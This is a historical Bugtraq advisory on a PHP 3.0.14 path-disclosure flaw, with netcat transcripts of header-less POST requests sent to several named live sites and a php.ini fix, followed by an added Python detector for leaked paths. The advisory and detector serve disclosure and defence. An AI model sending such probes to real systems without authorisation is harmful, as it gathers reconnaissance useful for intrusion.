Date: Thu, 15 Jun 2000 17:21:59 -0500
From: H D Moore <hdm@SECUREAUSTIN.COM>
Subject: PHP 3.0.14 Disclosure via POST requests
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

I noticed some not-so-good behavior in PHP 3.0.14 when dealing with POST requests that do not contain a content-type header in the request (illegal). The server will return the page anyways, but the first line will be a PHP warning message containing the full path to that file.

The PHP developers have _not_ been notified because the bug (?) only appears in older versions of their software (4.0 has been released) and the fact that path disclosure is a weak vulnerability by itself. The only reason I bothered posting this is because of the inordinate amount of interest on Bugtraq about NT's IIS giving away the pathnames to scripts.

Disabling PHP's warning messages can be done by changing the line in php.ini reading:

display_errors = On ; Print out errors (as a part of the HTML script)

to:

display_errors = Off ; Print out errors (as a part of the HTML script)

and restarting the webserver.

-HD
http://www.secureaustin.com
http://www.digitaldefense.net

Below are the results of my testing:

---[ PHP 3.0.14

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.secureaustin.com 80
POST /index.php3 HTTP/1.0
Host: www.secureaustin.com

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 22:06:13 GMT
Server: Apache/1.3.11 (Unix) PHP/3.0.14 mod_ssl/2.5.0 OpenSSL/0.9.4
X-Powered-By: PHP/3.0.14
Connection: close
Content-Type: text/html

<br>
<b>Warning</b>: POST Error: content-type missing in <b>/home/www/htdocs/secureaustin/index.php3</b> on line <b>1

---[ PHP 3.0.9

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.worldcupadvisor.com 80
POST /Main_Menu/body_main_menu.php3 HTTP/1.0
Host: www.worldcupadvisor.com

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 22:01:40 GMT
Server: Apache/1.3.3 (Unix) PHP/3.0.9 FrontPage/3.0.4.3
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
[ snip ]
hdm@atrophy:/var/www/htdocs/secureaustin >

---[ PHP 4.0B2

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.stonekeep.com 80
POST /ksonline/visitor.php3 HTTP/1.0
Host: www.stonekeep.com

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 21:57:11 GMT
Server: Apache/1.3.9 (Unix) PHP/4.0B2
Connection: close
Content-Type: text/html

<br>
<b>Fatal error</b>: No content-type in POST request in <b>[no active file]</b> on line <b>0</b><br>
hdm@atrophy:/var/www/htdocs/secureaustin >

---[ PHP 4.0

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.freshmeat.net 80
POST / HTTP/1.0
Host: www.freshmeat.net

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 21:48:59 GMT
Server: Apache/1.3.12 (Unix) PHP/4.0.0
Connection: close
Content-Type: text/html

<br>
<b>Fatal error</b>: No content-type in POST request in <b>Unknown</b> on line <b>0</b><br>
hdm@atrophy:/var/www/htdocs/secureaustin >

---[ PHP 4.0.1-dev

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.php.net 80
POST /quickref.php HTTP/1.0
Host: www.php.net
hdm@atrophy:/var/www/htdocs/secureaustin >   ^-- just disconnects
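The Python below is an added example and is not part of H D Moore's post or of PHP itself. It shows the defender's side of the two points the post makes: one function parses captured HTTP response bodies for PHP's HTML-formatted "Warning"/"Fatal error" lines and flags only those whose "in <b>...</b>" field is an absolute filesystem path (the PHP 3.0.14 behaviour above) rather than a placeholder such as "Unknown" (the PHP 4.0 behaviour); a second function reads the effective display_errors value out of a php.ini fragment so an operator can confirm the change the post recommends. The sample response bodies and ini fragments are constructed to mirror the ones quoted in the post, not captured from any live host.

```python
import re

# Constructed sample response bodies shaped like the ones quoted in the post.
SAMPLE_PHP3_BODY = (
    "<br>\n<b>Warning</b>: POST Error: content-type missing in "
    "<b>/home/www/htdocs/secureaustin/index.php3</b> on line <b>1"
)
SAMPLE_PHP4_BODY = (
    "<br>\n<b>Fatal error</b>: No content-type in POST request in "
    "<b>Unknown</b> on line <b>0</b><br>"
)
SAMPLE_CLEAN_BODY = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\n<HTML>\n<HEAD>'

# Constructed php.ini fragments: the weak setting and the corrected one.
WEAK_INI = "display_errors = On ; Print out errors (as a part of the HTML script)\n"
FIXED_INI = "display_errors = Off ; Print out errors (as a part of the HTML script)\n"

# PHP 3/4 emit errors as: <b>Level</b>: message in <b>file</b> on line <b>N</b>
# The closing </b> after the line number is optional because the PHP 3.0.14
# capture in the post is cut off right after the digit.
PHP_ERROR_RE = re.compile(
    r"<b>(Warning|Fatal error|Notice|Parse error)</b>:\s*(.*?)\s+in\s+<b>(.*?)</b>"
    r"\s+on\s+line\s+<b>(\d+)",
    re.S,
)


def _looks_like_path(text):
    """True for an absolute Unix path or a Windows drive path; False for placeholders."""
    return text.startswith("/") or re.match(r"^[A-Za-z]:\\", text) is not None


def find_php_errors(body):
    """Parse every PHP error line in an HTTP response body.

    Returns a list of dicts with level, message, file, line and a boolean
    leaks_path that is True only when the file field is a real filesystem path.
    """
    hits = []
    for match in PHP_ERROR_RE.finditer(body):
        level, message, file_field, line = match.groups()
        hits.append({
            "level": level,
            "message": message,
            "file": file_field,
            "line": int(line),
            "leaks_path": _looks_like_path(file_field),
        })
    return hits


def display_errors_enabled(ini_text):
    """Return True/False for the last display_errors line in a php.ini fragment,
    or None when the directive is absent. Trailing ';' comments are stripped,
    which matters for the commented lines quoted in the post."""
    result = None
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip().lower() == "display_errors":
            result = value.strip().lower() in ("on", "1", "true", "yes")
    return result


if __name__ == "__main__":
    for name, body in (("PHP 3.0.14", SAMPLE_PHP3_BODY), ("PHP 4.0", SAMPLE_PHP4_BODY),
                       ("clean", SAMPLE_CLEAN_BODY)):
        for hit in find_php_errors(body):
            flag = "PATH DISCLOSED" if hit["leaks_path"] else "no path"
            print(f"{name}: {hit['level']} in {hit['file']!r} line {hit['line']} -> {flag}")
    print("weak ini display_errors on:", display_errors_enabled(WEAK_INI))
    print("fixed ini display_errors on:", display_errors_enabled(FIXED_INI))
```

Run over a body of saved responses (or a proxy log) the regex finds the PHP 3.0.14 case and leaves the PHP 4.0 placeholder alone, which is the distinction the post's captures draw; the ini check is the quick way to verify the display_errors change actually took effect in the file the server reads.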